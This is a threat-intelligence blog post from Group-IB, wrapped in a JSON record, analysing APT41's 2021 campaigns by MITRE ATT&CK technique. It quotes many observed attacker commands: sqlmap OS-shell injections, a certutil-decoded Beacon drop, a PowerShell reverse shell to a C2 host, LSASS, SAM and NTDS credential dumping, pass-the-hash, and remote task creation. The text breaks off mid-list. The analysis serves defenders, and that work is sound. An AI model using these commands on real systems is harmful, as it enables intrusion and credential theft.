{ "id": "86910c10-cb2d-4e29-b505-3c995ba4be2d", "created_at": "2026-04-06T15:52:53.16633Z", "updated_at": "2026-04-10T03:32:27.385749Z", "deleted_at": null, "sha1_hash": "b8c8f7882ae6d87fb4652b6fbae63e6119856445", "title": "4 malicious campaigns and a new wave of APT41 attacks | Group-IB Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 191117, "plain_text": "Nikita Rostovcev\r\nAPAC Technical Head - ASM, TI \u0026 DRP\r\nAPT41 World Tour 2021 on a\r\ntight schedule\r\n4 malicious campaigns, 13 confirmed victims, and a new wave of Cobalt Strike infections\r\nAugust 18, 2022 · min to read · Advanced Persistent Threats\r\n← Blog\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 1 of 35\n\nAPT41 Threat Intelligence\r\nIn March 2022 one of the oldest state-sponsored hacker groups, APT41, breached government\r\nnetworks in six US states, including by exploiting a vulnerability in a livestock management system,\r\nMandiant investigators have reported.\r\nThroughout 2021, we closely watched APT41’s activity using our system called Group-IB Threat\r\nIntelligence, which is continuously enriched with indicators of compromise (IOCs) and new rules for\r\nhunting hacker groups and threat actors. Our efforts have resulted in about 80 proactive\r\nnotifications to private and government organizations worldwide regarding APT41 attacks (both\r\nin progress and completed) against their infrastructures so that the organizations could take the\r\nnecessary steps to protect themselves or search for traces of compromise in their networks. The\r\ndata about the tactics, techniques and procedures (TTPs) used by the attackers that we collected\r\nhelped us attribute the group’s other attacks. Using this data, we identified the threat actors’ “work”\r\nschedule, which makes it possible to describe their origin in more detail. In this blog post, we share\r\nour findings and describe the main methods, tactics and tools used by one of the most dangerous\r\nthreat groups out there, APT41, in 2021.\r\nThis blog post, which was written to bring together existing knowledge according to the MITRE\r\nATT\u0026CK (Adversarial Tactics, Techniques \u0026 Common Knowledge) framework, details how the\r\nhackers conducted reconnaissance, gained initial access, ensured persistence and moved across\r\nthe network, as well as what they were looking for on the compromised devices. In addition, we\r\nshare interesting findings such as the “work” schedule and working days of the attackers, together\r\nwith artifacts they left behind.\r\nThe first thing we want to mention is that APT41 used an unusual method of creating payloads on\r\ntarget servers, which involves writing an encoded payload in the form of a Cobalt Strike Beacon to\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 2 of 35\n\na file in multiple stages. To search for and exploit vulnerabilities, the group uses popular tools such\r\nas Acunetix, Nmap, JexBoss, sqlmap, and fofa.su (a Chinese equivalent of Shodan).\r\nInterestingly, according to sqlmap logs, the threat actors breached only half of the websites they\r\nwere interested in. This suggests that even hackers like APT41 do not always go out of their way to\r\nensure that a breach is successful.\r\nThis blog post also uncovers subnets from which the threat actors connected to their C\u0026C servers,\r\nwhich is further evidence confirming the threat’s country of origin.\r\nFor the first time, we were able to identify the group’s working hours in 2021, which are similar to\r\nregular office business hours.\r\nIT directors, heads of cybersecurity teams, SOC analysts and incident response specialists are likely\r\nto find this material useful. Our goal is to reduce financial losses and infrastructure downtime as well\r\nas to help take preventive measures to fend off APT41 attacks.\r\nIn the conclusion section, we give advice on how to identify the group’s infrastructure and protect\r\nyours. Let us hunt together for the threats, and contribute to the fight against cybercrime — a\r\nmission worthy of a superhero.\r\nWho are APT41?\r\nKey findings\r\nA state-sponsored group whose goals include cyber espionage and financial gain\r\nActive since at least 2007\r\nAlso known as BARIUM, Winnti, LEAD, WICKED SPIDER, WICKED PANDA, Blackfly, Suckfly,\r\nWinnti Umbrella, Double Dragon\r\nSome of the group’s members were indicted by the US Department of Justice in 2020; charges\r\nagainst them include unauthorized access to protected computers, aggravated identity theft,\r\nmoney laundering, and wire fraud\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 3 of 35\n\nAttack geography and target industries\r\nFirst, we will list all the countries and industries that came to our attention in 2021. Over this period,\r\nAPT41 conducted at least four malicious campaigns, which we named based on the domain names\r\nused in the attacks: ColunmTK, DelayLinkTK, Mute-Pond, and Gentle-Voice.\r\nWe estimate that in 2021 APT41 compromised and gained various levels of access to at least\r\n13 organizations worldwide.\r\nThe group’s targets include government and private organizations based in the US, Taiwan,\r\nIndia, Thailand, China, Hong Kong, Mongolia, Indonesia, Vietnam, Bangladesh, Ireland, Brunei,\r\nand the UK.\r\nIn the campaigns that we analyzed, APT41 targeted the following industries: the government\r\nsector, manufacturing, healthcare, logistics, hospitality, finance, education,\r\ntelecommunications, consulting, sports, media, and travel. The targets also included a political\r\ngroup, military organizations, and airlines.\r\nTo conduct reconnaissance, the threat actors use tools such as Acunetix, Nmap, Sqlmap,\r\nOneForAll, subdomain3, subDomainsBrute, and Sublist3r.\r\nAs an initial vector, the group uses web applications vulnerable to SQL injection attacks.\r\nBy performing SQL injections, APT41 gains access to the command shell of a targeted server\r\nand becomes able to execute commands.\r\nWe estimate that in 2021 APT41 detected and exploited SQL injection opportunities in 43 out\r\nof 86 web applications that they probed.\r\nThe main tool used in their campaigns is a custom Cobalt Strike Beacon.\r\nAPT41’s “working” days are Monday to Friday. They usually start at 10 AM and finish around 7\r\nPM (UTC+8).\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 4 of 35\n\nThe targets in these campaigns were organizations in the US, Taiwan, India, China, Thailand, Hong\r\nKong, Mongolia, Indonesia, Vietnam, Bangladesh, Ireland, Brunei, and the UK:\r\nNews agencies, government organizations, a major electronics manufacturer, and a logistics\r\ncompany in Taiwan\r\nA software developer and several companies that own a chain of hotels in the US\r\nA financial organization and an educational entity in Vietnam\r\nA news agency and a software developer in China\r\nAn Indian airline\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 5 of 35\n\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 6 of 35\n\nTTPs\r\nThis section describes APT41’s tactics, techniques and procedures that came to the attention of\r\nGroup-IB’s Threat Intelligence team in 2021.\r\nReconnaissance\r\nThe first stage of any attack is reconnaissance, as part of which threat actors use a wide range of\r\ntechniques to collect data about the target organization. They can be divided into two categories:\r\nactive and passive scanning. Below is a list of tools used by APT41 from both categories:\r\nActive scanning. T.1595:\r\nPassive scanning. Search Open Technical Databases: Scan Databases T1596.005:\r\nInitial Access\r\nExploit public-facing application – T1190\r\nA major question for an investigator is how the attackers penetrated the target system. At the\r\npenetration stage, APT41 threat actors used various techniques, including spear-phishing emails,\r\nexploiting a range of vulnerabilities (including Proxylogon), and watering hole and supply chain\r\nattacks. In the campaigns we analyzed, in some cases the threat actors penetrated target systems\r\nusing SQL injections. Below we describe the commands used by APT41 in detail. Such attacks were\r\ncarried out with the publicly available tool SQLmap, which the attackers used for multiple purposes.\r\nIn some organizations APT41 members gained access to the command shell of a target server and\r\nwere able to execute certain commands. The group also used this tool to upload files to the target\r\nAcunetix vulnerability scanner\r\nNmap network scanner\r\nUtilities for brute-forcing directories on web servers: OneForAll, subdomain3, subDomainsBrute,\r\nSublist3r\r\nJexBoss, a tool for searching for and exploiting vulnerabilities in Jbos and other Java\r\napplications\r\nfofa.su (a Chinese equivalent of shodan.io) scans the Internet and collects information about\r\nopen ports and services running on them, which enables attackers to determine their targets\r\nand conduct attacks more effectively.\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 7 of 35\n\nserver. At this stage, the files were either Cobalt Strike Beacons or custom web shells.\r\nIn other cases, the threat actors gained access to databases with information about existing\r\naccounts, lists of employees, and plaintext and hashed passwords.\r\nNevertheless, the main tool that the attackers used in their campaigns was Cobalt Strike Beacon.\r\nSQLmap launched in various attacks:\r\npython sqlmap.py -r [Company1_domain].txt --tamper=space2comment --random-agent -p\r\nctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPasswo\r\n--os-shell python sqlmap.py -r [Company2_domain].txt -p\r\n\"ctl00%24MainContent%24txtUserName,ctl00%24MainContent%24txtPassword\" --is-dba --\r\nhex sqlmap.py -u [Company3_domain]/content.php?id=2141\u0026sub=153 --random-agent --\r\ntamper=space2comment --time-sec=10 --current-user python sqlmap.py -r\r\n[Company4_domain] -p\r\n\"ctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPassw\r\n--file-write=\"/root/sqlmap/{Redacted_filename}.aspx\" --file-dest=\"\r\n{Redacted_filepath}\\\\login1.aspx\" python sqlmap.py -u\r\n\"http://[Company5_domain]/[redacted]/[redacted]/[redacted].php/?\r\npage1=DM\u0026page2=TOTAL_DATA_DOWNLOAD\u0026page3=TOTAL_DATA_DOWNLOAD\" -p\r\n\"page1\" --file-read \"/etc/passwd\"\r\nThe SQL injections enabled the threat actors to gain various levels of access to 43 out 86 websites\r\nthey probed. The following diagrams were built based on sqlmap logs. According to this data,\r\nMySQL was installed on most of the compromised websites.\r\nExecution\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 8 of 35\n\nWindows Command Shell – T1059.003 Command and Scripting Interpreter\r\nAt this stage of attack, in order to upload malicious code to target devices and execute it, the threat\r\nactors chose the following unique method:\r\nThey used Cobalt Strike Beacon as a payload. In one of the observed cases, in order to write the\r\nentire payload to a file, the threat actors needed to repeat this action 154 times.\r\necho\r\nTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n\u003e\u003e C:\\dns.txt ---- echo\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nC:\\dns.txt echo\r\n5kgXfx+Ig8S1vr8p7ifpkRNTIwypOpYrBDdptgjbLcJBcAUqEK/+D85bYT9RGiYYZ9UR4ejo6ca0\r\nC:\\dns.txt\r\ncertutil -decode C:\\dns.txt C:\\dns.exe certutil -hashfile C:\\dns.exe copy C:\\dns.exe\r\nC:\\WINDOWS\\dns.exe move C:\\dns.exe C:\\windows\\mciwave.exe\r\nThe same method of dividing the payload was observed in the network belonging to another\r\norganization, where the threat actors divided the code into chunks of 1,024 characters. To write the\r\npayload fully, in this case they needed 128 iterations.\r\n1. Once the payload is compiled, it is encoded in Base64.\r\nThe encoded payload is divided into chunks of 775 characters and added to a text file using the\r\nfollowing command: Echo [Base64]{775} \u003e\u003e C:\\dns.txt\r\n2.\r\nOnce the encoded payload has been written to a file, the utility called certutil with the parameter\r\n—decode is launched. The utility converts the Base64-encoded payload into an .exe file. Certutil\r\nis a built-in tool in Windows systems.\r\n3.\r\nAfter the file is decoded, the attackers launch certutil again, with the parameter —hashfile. This\r\nparameter is necessary to obtain the hash of the resulting file. This action has to do with the fact\r\nthat the attackers conduct each iteration manually and could make a mistake at a certain point.\r\nChecking the file hash helps ensure that the data has been written correctly and that the\r\npayload has been decoded without any errors.\r\n4.\r\nThe file is then renamed and sent to other directories to cover any tracks, after which the\r\nattackers launch it.\r\n5.\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 9 of 35\n\necho\r\no3wiZy3M7pERynevamNQTtL5VZf3C+vS22sRbsUgj8Lw005hIB1mVlNyvdw5GWrKgdMrpkJ2m\r\n\u003e\u003e C:\\temp\\bug.txt echo\r\nWv39JqjpZEGW7rjPYW5t09Ck9AQTc94kJ5nfTPEh6KVvRAeuMw23lQdZy/ZquMQOcy9ozRl7\r\n\u003e\u003e C:\\temp\\bug.txt\r\nBelow are other identified methods of uploading and executing malicious files. These are not\r\nunique:\r\nCommand and Scripting Interpreter: PowerShell – T1059.001\r\nAPT41 used PowerShell to obtain a reverse shell. The PowerShell code that the group used was\r\nexecuted in stealth mode and meant that the device it was executed on could communicate with\r\nthe C\u0026C server, which in turn allowed the threat actors to execute remote commands.\r\npowershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object\r\nNet.Sockets.TCPClient('{redacted}', 80);$NetworkStream =\r\n$TCPClient.GetStream();$StreamWriter = New-Object\r\nIO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer =\r\n0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL\u003e\r\n');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer,\r\n0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0,\r\n$BytesRead - 1);$Output = try {Invoke-Expression $Command 2\u003e\u00261 | Out-String} catch {$_ |\r\nOut-String}WriteToStream ($Output)}$StreamWriter.Close()\"\r\nScheduled Task/Job: Scheduled Task – T1053.005\r\nTask Scheduler was used to launch malicious files on computers where the threat actors already\r\nhad sessions as well as on computers that the group discovered during reconnaissance.\r\nSCHTASKS /Create /S 192.168.100.19 /U \"{redacted}\\administrator\" /P \"!@#Virg0#@!\" /RU\r\nSYSTEM /SC DAILY /TN Exec2022 /TR \"C:\\windows\\system32\\taskhosts.exe\" SCHTASKS\r\n/run /S 192.168.100.19 /U \"{redacted}\\administrator\" /P \"!@#Virg0#@!\" /TN Exec2022\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 10 of 35\n\nSystem Services: Service Execution – T1569.002\r\nWindows services were created and launched with the aim of running either an executable or a\r\nscript file called install.bat. We described it in our blog post about the ColunmTK campaign. This file\r\nhas been mentioned several times by other vendors (e.g., Mandiant), which is why we are not\r\ndescribing it in detail here.\r\nsc \\\\172.16.2.146 Create SuperIe binPath= \"cmd.exe /k \"c:\\users\\public\\install.bat\"; sc\r\n\\\\192.168.111.112 create res binpath=\"C:\\PerfLogs\\vmserver.exe\"; sc \\\\192.168.111.112 start res;\r\nsc query LxpSrvc; sc delete LxpSrvc;\r\nWindows Management Instrumentation – T1047\r\nThe hackers did not overlook Windows Management Instrumentation and used the technique in\r\nseveral malicious campaigns.\r\nwmic /node:172.19.97.102 /user:{redacted}\\{redacted} /password:P$ssw0rd0006 process call\r\ncreate \"C:\\users\\Public\\COMSysUpdate.exe\" wmic /node:172.21.2.177 /user:{redacted}\\\r\n{redacted} /password:Passw0rd@123 process call create \"c:\\users\\Public\\install.bat\"\r\nPersistence\r\nTo ensure persistence in target systems, the attackers used Task Scheduler and created Windows\r\nservices.\r\nScheduled Task/Job: At (Windows) – T1053.002\r\nschtasks /create /s 192.168.111.3 /u {redacted} /p {redacted} /tn dda /sc onstart /tr\r\nC:\\PerfLogs\\vmserver64.exe /ru system /f SCHTASKS /Create /S 10.200.244.222 /U\r\ntest\\administrator /P {redacted} /RU \"system\" /tn rlsv /sc DAILY /tr c:\\2012.bat /F SCHTASKS\r\n/Create /S 192.168.100.19 /U \"{redacted}\\administrator\" /P {redacted} /RU SYSTEM /SC DAILY\r\n/TN Exec2022 /TR \"C:\\windows\\system32\\taskhosts.exe\" schtasks /create /tn rlsv1 /U\r\ntest\\Administrator /P {redacted} /tr C:\\2012.bat /sc DAILY /s 10.200.244.222 /RU system\r\nSCHTASKS /Create /RU SYSTEM /SC ONSTART /TN Update /TR\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 11 of 35\n\n\"C:\\windows\\system32\\calc.exe\" SCHTASKS /Create /RU SYSTEM /SC ONSTART /TN\r\ndllhosts /TR \"dllhosts.exe\" schtasks.exe /s 192.168.0.28 /u \"administrator\" /p {redacted}\r\n/Create /tn VMUSS /tr \"c:\\users\\public\\install.bat\" /st 15:58 /sc once /ru system\r\nSystem Services: Service Execution – T1543.003\r\nsc \\\\172.26.16.81 Create SuperIe binPath= \"cmd.exe /k\r\nc:\\users\\public\\SecurityHealthSystray.exe\" sc Create syscmd binpath=\"cmd/k start\"type=\r\nown type= interact sc \\\\192.168.111.112 create res binpath=\"C:\\PerfLogs\\vmserver.exe\" sc\r\nstart LxpSrvc\r\nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder – T1547.001\r\nIn some cases the threat actors placed their malicious files in the startup folder on remote\r\ncomputers, which made the files execute every time the victim’s operating system was launched.\r\ncopy C:\\temp\\LxpSvc.exe \"\\\\192.168.100.4\\c$\\Users\\administrator.\r\n{redacted}\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\LxpSvc.exe\"\r\nPrivilege Escalation\r\nOur analysis did not reveal any instances of APT41 using unique ways of escalating privileges in the\r\nnetwork. In addition to the standard capabilities of Cobalt Strike, for such purposes APT41 mainly\r\nused additional modules and cna. Publicly available tools for local privilege escalation (such as\r\nBadPotato) were also used to establish persistence. Moreover, the attackers used password hashes\r\nor accounts obtained at the reconnaissance stage.\r\ncmd.exe /c c:\\windows\\Temp\\BadPotatoNet4.exe c:\\windows\\Temp\\COMSysCon.exe;\r\nexecute-assembly C:\\Users\\Administrator\\Desktop\\SweetPotato.exe\r\nE:\\Projects\\Operations\\uploads\\documents\\docs\\AxInstSV.exe.\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 12 of 35\n\nDefense Evasion\r\nObfuscated Files or Information: Software Packing – T1027.002\r\nBeing discreet and staying in the victim’s network unnoticed for as long as possible is the goal of\r\nany APT. How did APT41 members try to avoid being noticed and cover their tracks? The threat\r\nactors used the well-known protection tool Themida to obfuscate their malicious files.\r\nIndicator Removal on Host: File Deletion – T1070.004\r\nWhen certain files were no longer needed, the attackers deleted them.\r\ndel C:\\temp\\LxpSvc.exe del c:\\users\\public\\BadPotatoNet4.exe del\r\n\\\\172.16.2.21\\c$\\users\\Public\\SecurityHealthSystray.dll del\r\n\\\\172.16.2.21\\c$\\users\\Public\\SecurityHealthSystra.ocx copy\r\n\"C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx\" \"C:\\PerfLogs\\mwt.evtx\"\r\nC:\\PerfLogs\\mwt.evtx rm C:\\PerfLogs\\mwt.evtx\r\nFile and Directory Permissions Modification: Windows File and Directory Permissions\r\nModification – T1222\r\nicacls \\\\192.168.0.243\\c$\\www\\{redacted}\\test2.asp /grant IIS_IUSRS:F\r\nImpair Defenses: Indicator Blocking – T1562.006\r\nAs mentioned earlier, Cobalt Strike was the main tool used in all the campaigns.\r\nThe threat actors developed a custom injector that makes it possible to bypass Event Tracing\r\nfor Windows (ETW), thereby making the process invisible to the logging system in Windows.\r\nThe second noteworthy feature of this injector is a method taken from an open GitHub\r\nrepository. The idea is to be able to launch a new process in a way as to ensure that neither\r\nWindows nor antivirus software can inject their binaries into this process, which enables the\r\nthreat actors to bypass built-in antivirus tools.\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 13 of 35\n\nThe tool is called StealthMutant and it has been described in detail by researchers at Trend Micro.\r\nCredential Access\r\nThis section outlines how the threat actors obtained credentials. To do so, APT41 uses several\r\ndifferent, fairly popular techniques.\r\nOS Credential Dumping: NTDS – T1003.003\r\nThe Group-IB Threat Intelligence team discovered that 2021 APT41 campaigns most often involved\r\na Windows utility called Ntdsutil. The attackers used the tool to obtain a copy of the ntds.dit file,\r\nwhich is a database that stores Active Directory data, including information about user objects,\r\ngroups, and group membership. The database also includes the password hashes for all the users\r\nof the domain.\r\nntdsutil \"ac i ntds\" \"ifm\" \"create full C:\\perflogs\\temp\" q q ntdsutil \"activate instance ntds\" \"ifm\"\r\n\"create full C:\\PerfLogs\\temp\" quit quit\r\nOS Credential Dumping: Security Account Manager – T1003.002\r\nThe threat actors also extracted account data from the Security Account Manager (SAM). SAM\r\nmanages the Windows account database, which includes storing passwords and private user data,\r\ngrouping the logical structure of accounts, setting security policies, collecting statistics, and\r\ncontrolling access to the database. This data is available either in the registry key\r\nHKEY_LOCAL_MACHINE\\SAM\\SAM or in a binary file at %WINDIR%\\System32\\Config\\SAM. The\r\nattackers tried to make a copy of this database from the registry using the “reg save” command or\r\nby exploiting volume shadow copies.\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 14 of 35\n\nreg save HKLM\\SAM C:\\perflogs \\sam.save copy \\\\?\r\n\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy11\\Windows\\System32\\config\\SAM\r\nc:\\users\\public\\SAM\r\nOS Credential Dumping: LSASS Memory -T1003.001\r\nAnother source of account credentials is the Local Security Authority Subsystem Service (LSASS)\r\nmemory. It is a process in Microsoft Windows operating systems that enforces the security policy on\r\nthe system. It verifies users logging on to a Windows computer or server, handles password\r\nchanges, and creates access tokens. To dump the LSASS process, the threat actors used the\r\nutilities Procdump and Mimikatz.\r\nprocdump64.exe -accepteula -ma lsass.exe lsass.dmp C:\\mi.exe \"\"privilege::debug\"\"\r\n\"\"sekurlsa::logonpasswords full\"\" exit \u003e\u003e C:\\log.tx mimikatz's sekurlsa::logonpasswords\r\nCredentials from Password Stores: Credentials from Web Browsers – T1555.003\r\nThe threat actors used BrowserGhost, which is a tool designed to obtain credentials from browsers.\r\nBrowserGhost.exe \u003e\u003e iis.txt\r\nUnsecured Credentials: Credentials In Files – T1552.001\r\nThe attackers also searched for strings that contain keywords like “user” or “password” in specific\r\nfiles or entire directories.\r\nfindstr /c:\"User\" /c:\"Password\" /si web.config findstr /c:\"User ID=\" /c:\"Password=\"\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 15 of 35\n\nDiscovery\r\nThreat actors usually use this stage to obtain more information about the infected computer and its\r\nlocal network. At this point, cybercriminals most often leverage the tools built into the operating\r\nsystem.\r\nAccount Discovery – T1087\r\nThe Net utility is used to display information about the computer’s network configuration. The utility\r\nhelped the adversaries gather information about domain group membership and collect lists of\r\nadministrators.\r\nnet user /domain \u003e 1.txt net user net localgroup administrators net accounts /domain net\r\ngroup \"Domain Admins\"\r\nSystem Information Discovery – T1082\r\nAt this stage, the attackers gathered information about the system basic configuration (e.g., the\r\nWindows version or system architecture).\r\necho %PROCESSOR_ARCHITECTURE% systeminfo whoami net config Workstation\r\nPermission Groups Discovery – T1069\r\nThe adversary obtained a list of objects from Windows groups as follows:\r\nnet group \"Domain Admins\" /domain net group \"domain Controllers\" net group \"Exchange\r\nServers\" net group \"Schema Admins\" net group \"Protected Users\" net group \"Enterprise\r\nAdmins\" net group \"Enterprise Read-only Domain Controllers\" net group \"Exchange Domain\r\nServers\"\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 16 of 35\n\nQuery Registry – T1012\r\nThe hackers made queries to the registry to obtain information about the currently used RDP ports\r\nor network configurations.\r\nreg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server\\WinStations\\RDP-Tcp /v PortNumber\" reg query\r\n\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\"\r\nreg query \"HKEY_LOCAL_MACHINE\r\n\\SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters\\Interfaces\\{1f777394-0b42-11e3-\r\n80ad-806e6f6e6963}\"\r\nDomain Trust Discovery – T1482\r\ndsquery site\r\nSystem Time Discovery – T1124\r\nnet time /domain\r\nProcess Discovery – T1057\r\nIn some cases, the threat actors conducted reconnaissance on remote devices to establish whether\r\nfiles with certain names were running on them. The attackers had downloaded these files to remote\r\ndevices earlier.\r\ntasklist /pid 1428 /f tasklist /s 172.16.2.132 /u test\\administrator /p {redacted} tasklist | findstr\r\nupdate_x64.exe\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 17 of 35\n\nNetwork Service Scanning – T1046\r\nAt this stage, the threat actors also used a publicly available tool called cping to identify local\r\ncomputers vulnerable to SMB attacks.\r\nC:\\PerfLogs\\cping40.exe scan smbvul 10.0.0.1 10.0.10.1 \u003e 10.txt cping40.exe scan smbvul\r\n192.168.20.1 192.168.29.1 \u003e 30.txt\r\nNetwork Share Discovery – T1135\r\nThe threat actors attempted to detect available network drives:\r\nnet share net view /DOMAIN\r\nSystem Network Configuration Discovery – T1016\r\nOne of the ways in which the threat actor obtained information about the available network\r\nconfiguration was to access the registry key directly:\r\nreg query \"HKEY_LOCAL_MACHINE\r\n\\SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters\\Interfaces\\{1f777394-0b42-11e3-\r\n80ad-806e6f6e6963}\"\r\nSystem Network Connections Discovery – T1049\r\nTo identify network connections, the hackers used a built-in utility called netstat:\r\nnetstat -ano netstat -r netstat -an netstat -aon|findstr \"8080\" netstat -ano | findstr dns.exe\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 18 of 35\n\nRemote System Discovery – T1018\r\nThe hackers used the Ping command with a single echo request to identify other devices on the\r\nlocal network. In order to simplify their tasks, they used a FOR loop. They also used the SETSPN\r\nutility to identify on which devices in the domain a particular service was running. This helped the\r\nattackers identify which devices were running the following services: IIS, SQL and MSSQL.\r\nIt is important to note that in one of the cases we analyzed, the threat actors used the “payload”\r\nstring instead of the necessary one, which indicates that the command was copied from another\r\nsource.\r\nping -n 1 PIST-FILE-SRV for /l %i in (1,1,255) do @ping 172.67.204.%i -w 1 -n 1|find /i \"ttl=\"\r\nsetspn -T [target_company_name4] -Q */* | payload setspn -T [target_company_name6] -Q\r\n*/* | findstr IIS setspn -T [target_company_name5] -Q */* | findstr SQL setspn -T\r\n[target_company_name6] -Q */* | findstr MSSQL\r\nLateral Movement\r\nTo move laterally, the threat actors used credentials gathered at the previous stage. If they only had\r\npassword hashes, they carried out Pass-The-Hash attacks using Mimikatz.\r\nUse Alternate Authentication Material: Pass the Hash – T1550.002\r\nmimikatz's sekurlsa::pth /user:Administrator /domain:{redacted} /ntlm:{redacted}\r\n/run:\"%COMSPEC% /c echo 70c64df2976 \u003e \\\\.\\pipe\\277bf3\" mimikatz's sekurlsa::pth /user:\r\n{redacted} /domain:{redacted} /ntlm:{redacted} /run:\"%COMSPEC% /c echo 22074328564 \u003e\r\n\\\\.\\pipe\\bce0a1\"\r\nLateral Tool Transfer – T1570\r\njump psexec64 {redacted} dns windows/beacon_dns/reverse_dns_txt (ns1.colunm.tk:53) on\r\n{redacted} via Service Control Manager (\\\\[redacted]\\ADMIN$\\c3632b3.exe) copy\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 19 of 35\n\nc:\\users\\public\\COMSysUpdate.exe \\\\172.19.97.101\\c$\\users\\public\\COMSysUpdate.exe\r\nCollection\r\nArchive Collected Data: Archive via Utility – T1560.001\r\nTo collect data, APT41 downloaded a portable archiver file to compromised devices. The group\r\narchived the necessary files and exfiltrated them to their intermediate server.\r\n7z.exe a syslog.7z Intl 7z.exe a iislog.7z Intl 7z.exe a Ops.7z C:\\PerfLogs\\Ops\\\r\nC:\\perflogs\\7z.exe a -tzip C:\\perflogs\\nt.zip C:\\perflogs\\temp\\\r\nData from Configuration Repository – T1602\r\nOn the network belonging to a software developer, the hackers gained access to the developer’s\r\nprivate GitHub repository. The repository was used to store various sensitive data such as\r\ncredentials for remote servers, private certificates, and a list of servers.\r\nshell git clone \"ssh://jenkins@{redacted}:29418/DevOps/Playbook2\" shell git clone\r\n\"ssh://jenkins@{redacted}:29418/DevOps/Inventory/Cloud/Intl\" shell git clone\r\n\"ssh://jenkins@192.168.0.251:29418/DevOps/Inventory\"\r\nData from Local System – T1005\r\nThe group obtained files from shadow copies and the Windows logging system.\r\nvssadmin list shadows vssadmin create shadow /for=c: vssadmin delete shadows /for=c:\r\n/quiet esentutl /p /o ntds.dit copy \"C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx\" \"C:\\PerfLogs\\mwt.evtx\"\r\ncopy \"C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx\" \"C:\\PerfLogs\\mwt.evtx\" rd:true /q:\"*\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 20 of 35\n\n[System[(EventID=4624 or EventID=4648 or EventID=4672)] and\r\nEventData[(Data[@Name='LogonType']='2' or Data[@Name='LogonType']='10')]]\"| findstr /i\r\n/c:\"Date\" /c:\"Logon Type:\" / c:\"Account Name\" /c:\"Workstation Name:\" / c:\"Source Network\r\nAddress\"\r\nCommand and Control\r\nAs mentioned above, most APT41 attacks were conducted using Cobalt Strike.\r\nApplication Layer Protocol: Web Protocols – T1071.001\r\nThe group used HTTP and HTTPS listeners to communicate with C\u0026C servers.\r\nApplication Layer Protocol: DNS – T1071.004\r\nTo hide all communication with C\u0026C servers, the threat actors also used DNS tunnels.\r\nhttps://www.group-ib.com/blog/apt41-world-tour-2021/\r\nPage 21 of 35\n\nIngress Tool Transfer – T1105\r\nThe threat actors used Cobalt Strike to upload their files to compromised devices. For certain\r\ntargeted organizations, the group uploaded files from special directories named after the\r\ncompromised organization.\r\nupload C:\\Users\\Administrator\\Desktop\\cs\\dns\\COMSysUpdate.ocx upload\r\nC:\\Users\\Administrator\\Desktop\\webshell\\uploada4.aspx upload\r\nc:\\users\\alex\\desktop\\smb.exe upload\r\nC:\\Users\\Administrator\\Desktop\\cs\\SecurityHealthSystray.dll upload\r\nC:\\Users\\Administrator\\Desktop\\cs\\install.bat upload\r\nC:\\Users\\jack\\Desktop\\tmp\\cs_shell\\server\\install.bat upload\r\nC:\\Users\\jack\\Desktop\\tmp\\cs_shell\\server\\bthsvc64.dll upload\r\nC:\\Users\\jack\\Desktop\\tmp\\procdump64.exe upload C:\\Users\\jack\\Desktop\\\r\n{redacted}\\244\\mciwave32.dll upload C:\\Users\\Admin\\Desktop\\\r\n{redacted}\\HTTPS\\LxpSvc.exe upload C:\\Users\\Admin\\Desktop\\Webshell upload\r\nC:\\Users\\Admin\\Desktop\\{redacted}\\webshell\\test4.aspx upload C:\\Users\\Admin\\Desktop\\\r\n{redacted}\\远控\\service\\install.bat upload C:\\Users\\Admin\\Desktop\\{redacted}\\LxpSrvc.dll\r\nupload 